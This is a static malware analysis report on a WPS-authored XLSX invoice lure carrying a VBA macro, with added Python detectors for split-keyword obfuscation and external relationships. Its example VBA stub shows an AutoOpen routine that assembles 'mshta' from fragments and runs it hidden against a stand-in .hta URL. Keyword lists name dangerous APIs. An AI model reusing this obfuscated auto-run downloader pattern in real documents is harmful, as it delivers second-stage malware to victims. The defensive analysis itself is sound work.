Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 0127ed2d5c88bea1…

MALICIOUS

Office (OOXML) / .XLSX

Size: 60.5 KB
Created: 2006-10-11 04:02:12 UTC (core-properties timestamp; OOXML creation dates are inherited from the template and freely editable, so this date says nothing about when the lure was built)
Authoring application: WPS Office 12.0000
MD5: 30f70aa50b3b8186d1f0852bfeb46aa7
SHA-1: 8e606582f75aba27aad87c6a0628fd8d26969e22
SHA-256: 0127ed2d5c88bea1754efc672d6990dab2ea987fa76d6047cf0807b7f8bd9208
Risk score: 168

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1218.005 System Binary Proxy Execution: Mshta
T1566.001 Phishing: Spearphishing Attachment

The sample is an OOXML workbook that carries a VBA project. The visible sheet content presents itself as an invoice, which is what the 'SE_INVOICE_LURE' heuristic flags. The macro hides its intent by assembling the LOLBin name 'mshta' from several short string literals, so the word never appears in any single literal, and an auto-execution subroutine (reported as 'AutoOpen') passes the assembled command line to 'Shell'. Because mshta.exe executes HTML Application content from a local or remote location, the expected behaviour is retrieval and execution of a second-stage payload; the invoice lure exists only to persuade the recipient to enable macros, the one step that needs user interaction. In Excel the auto-run entry points are Auto_Open and Workbook_Open, so confirm the procedure name in the extracted macros.bas before concluding that the macro fires on open rather than on a manual call.
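The folding step behind the split-keyword finding, as an added Python example that is not part of the report or of the scanner that produced it: it merges adjacent string literals joined by & or + (including across a VBA line continuation) and reports any keyword that exists only after folding, which is the signal the 'OLE_VBA_SPLIT_KEYWORD_OBFUSCATION' rule below describes. The VBA snippet, the keyword list and the example.invalid URL are constructed for illustration; the real macros.bas is not reproduced here.

```python
import re

# Names the heuristic looks for once concatenated literals are folded back together
# (the report's own examples plus the one this sample hides, 'mshta'); compared lowercase.
DANGEROUS_KEYWORDS = (
    "mshta", "powershell", "wscript.shell", "scripting.filesystemobject",
    "urldownloadtofile", "shell.application", "createobject",
)

# Constructed stand-in for the pattern the report describes (not the real macros.bas):
# 'mshta' never appears in one literal, but the concatenation evaluates to it.
SAMPLE_VBA = '''
Sub AutoOpen()
    Dim a As String, b As String
    a = "ms" & "h" & _
        "ta"
    b = a + " http://" & "example" & ".invalid/x.hta"
    Shell b, vbHide
End Sub
'''

# A VBA string literal; a doubled quote is the escape for a quote inside it.
_LITERAL = re.compile(r'"((?:[^"]|"")*)"')
# Two literals joined by & or +, optionally across a " _" line continuation.
_CONCAT = re.compile(r'"((?:[^"]|"")*)"\s*[&+]\s*(?:_\s+)?"((?:[^"]|"")*)"')


def fold_literals(vba):
    """Merge adjacent concatenated literals until nothing changes ("ms" & "h" & "ta" -> "mshta")."""
    prev = None
    while prev != vba:
        prev = vba
        vba = _CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), vba)
    return vba


def literals(vba):
    """Lower-cased contents of every string literal in the source."""
    return [s.lower() for s in _LITERAL.findall(vba)]


def find_split_keywords(vba):
    """Keywords present in some folded literal but in no original literal.

    That difference is the heuristic's signal: a name that only exists after
    concatenation was split on purpose to defeat keyword scanning."""
    before = literals(vba)
    after = literals(fold_literals(vba))
    hits = {}
    for kw in DANGEROUS_KEYWORDS:
        if any(kw in s for s in after) and not any(kw in s for s in before):
            hits[kw] = sorted(s for s in after if kw in s)
    return hits


if __name__ == "__main__":
    print(fold_literals(SAMPLE_VBA))
    print(find_split_keywords(SAMPLE_VBA))
```

This only undoes plain concatenation; Chr()/ChrW() arithmetic, StrReverse, Replace and runtime-built names need an evaluator (olevba's --deobf option handles several of these), and a comment line containing a stray quote can desynchronise the literal regex, so strip comments first on real samples.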

Heuristics (5)

  • OLE_VBA_SPLIT_KEYWORD_OBFUSCATION (critical): Dangerous API name reassembled from split string literals
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation has no purpose in legitimate code other than evading keyword scanning.
  • OOXML_EXTERNAL_REL (high): External relationship
    External target in xl/externalLinks/_rels/externalLink2.xml.rels: file:///\\Sskim\최종선적현황\7-9BUY\HS VINA 7-9BUY 최종선적분.xls
    (Korean path components: "최종선적현황" is "final shipment status", "최종선적분" is "final shipment lot".) This is a UNC path to a host named Sskim, not a download location. Excel only follows it when the user updates links, and doing so would attempt an SMB connection to that host, so treat the host and path as indicators to record rather than something to resolve from an analysis machine with network access.
  • OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens
    The compiled VBA/cache stream contains an auto-execution token together with shell, download or object-execution tokens. This rule covers p-code-only (stomped) documents and cases where source extraction failed, i.e. where no readable source is available to the other rules.
  • OOXML_VBA (medium): VBA project inside OOXML
    Document contains a VBA project, so VBA macros are present.
  • SE_INVOICE_LURE (low): Fake invoice / payment lure
    Document contains invoice or payment language paired with an action verb. Useful context when combined with link, macro, or attachment indicators.
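A triage pass over the package itself, covering the 'OOXML_EXTERNAL_REL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' findings above, as an added Python example rather than the report's own tooling: it walks every .rels part for TargetMode="External" relationships and runs a case-insensitive token scan over xl/vbaProject.bin in both ASCII and UTF-16LE, the two encodings identifiers take inside VBA project streams. The zip it builds is a constructed stand-in for the analysed workbook: the fileserver.example UNC path and host are made up, and the vbaProject.bin entry is a plain byte string carrying identifier tokens, not a valid OLE/MS-OVBA container.

```python
import io
import zipfile
import xml.etree.ElementTree as ET  # use defusedxml.ElementTree for untrusted samples

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Token sets modelled on the report's heuristic text; all lowercase because the
# scan lower-cases the blob before counting.
AUTOEXEC_TOKENS = ("auto_open", "autoopen", "workbook_open", "document_open", "autoexec")
EXEC_TOKENS = ("shell", "createobject", "mshta", "urldownloadtofile",
               "wscript.shell", "powershell")


def external_relationships(zf):
    """Return (rels part, relationship type, target) for every TargetMode="External" relationship."""
    found = []
    for name in zf.namelist():
        if not name.endswith(".rels"):
            continue
        root = ET.fromstring(zf.read(name))
        for rel in root.iter(RELS_NS + "Relationship"):
            if rel.get("TargetMode", "Internal").lower() == "external":
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]  # e.g. externalLinkPath, oleObject
                found.append((name, rel_type, rel.get("Target", "")))
    return found


def _count_token(lowered, tok):
    """Occurrences of tok as ASCII plus as UTF-16LE in an already lower-cased blob."""
    return lowered.count(tok.encode("ascii")) + lowered.count(tok.encode("utf-16-le"))


def scan_vba_project(blob):
    """Count auto-exec and execution tokens in a VBA project blob.

    Module and dir streams inside a real vbaProject.bin are MS-OVBA compressed, so
    run this on decompressed streams when you can; on the raw container it is the
    best-effort check for the source-extraction-failure case the heuristic targets."""
    lowered = blob.lower()  # bytes.lower() folds ASCII letters only; UTF-16LE NULs are untouched
    autoexec = {t: _count_token(lowered, t) for t in AUTOEXEC_TOKENS}
    execution = {t: _count_token(lowered, t) for t in EXEC_TOKENS}
    autoexec = {t: n for t, n in autoexec.items() if n}
    execution = {t: n for t, n in execution.items() if n}
    return {"autoexec": autoexec, "exec": execution,
            "suspicious": bool(autoexec) and bool(execution)}


def triage(package):
    """Open an OOXML package from bytes and run both checks."""
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        report = {"external_rels": external_relationships(zf), "vba": None}
        if "xl/vbaProject.bin" in zf.namelist():
            report["vba"] = scan_vba_project(zf.read("xl/vbaProject.bin"))
    return report


def build_sample_package():
    """Constructed stand-in for the analysed workbook (not the real sample).

    The UNC target and host name are invented, and the vbaProject.bin entry is a
    plain byte string with identifier tokens in it, not a valid OLE container."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/externalLinkPath" '
        'Target="file:///\\\\fileserver.example\\share\\budget.xls" TargetMode="External"/>'
        '</Relationships>'
    )
    fake_vba = (b"\x00" * 16 + b"Auto_Open" + b"\x00" * 8
                + "Shell".encode("utf-16-le") + b"\x00" * 8 + b"MsHtA")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/externalLinks/_rels/externalLink1.xml.rels", rels)
        zf.writestr("xl/vbaProject.bin", fake_vba)
    return buf.getvalue()


if __name__ == "__main__":
    result = triage(build_sample_package())
    for part, rel_type, target in result["external_rels"]:
        print(f"external {rel_type} in {part}: {target}")
    print("vba:", result["vba"])
```

On a real sample, feed the stream contents extracted with olefile (and decompressed, as olevba does) into scan_vba_project rather than the raw container, and expect "shell" to also count inside "wscript.shell"; the counts are for triage, not for attribution of individual calls.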

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
  SHA-256: f5bb5abcb5bb0a57f2b6b51e96f69c0933b1f1c78295a511b6e598fdd448b921
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 2315 bytes

Filename: vbaProject_00.bin
  SHA-256: 6858f984dbfc9ad7ba196d1209d5df7691a6c97c4f8248e422fd9b6ff08750e1
  Kind: vba-project
  Source: OOXML VBA project: xl/vbaProject.bin
  Size: 16896 bytes